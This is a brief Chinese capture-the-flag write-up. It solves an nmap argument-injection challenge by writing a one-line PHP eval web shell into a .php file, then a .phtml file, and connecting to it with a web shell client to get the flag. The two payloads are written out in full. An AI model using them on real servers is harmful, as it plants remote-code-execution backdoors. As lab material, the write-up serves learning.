1.介绍

1.1nmap使用

2.步骤

2.1使用nmap命令输入一句话进行保存。

' <?php @eval($_POST["hack"]);?> -oG hack.php '

2.2发现没有成功。使用phtml进行绕过

' <?= @eval($_POST["pd"]);?> -oG pd.phtml '

2.3访问，验证上传成功。

2.4使用菜刀进行链接，找到flag。

3.借鉴

(48条消息) [网鼎杯 2020 朱雀组]Nmap_浩歌已行的博客-CSDN博客 

Charon的小Pluto的博客 (cnblogs.com)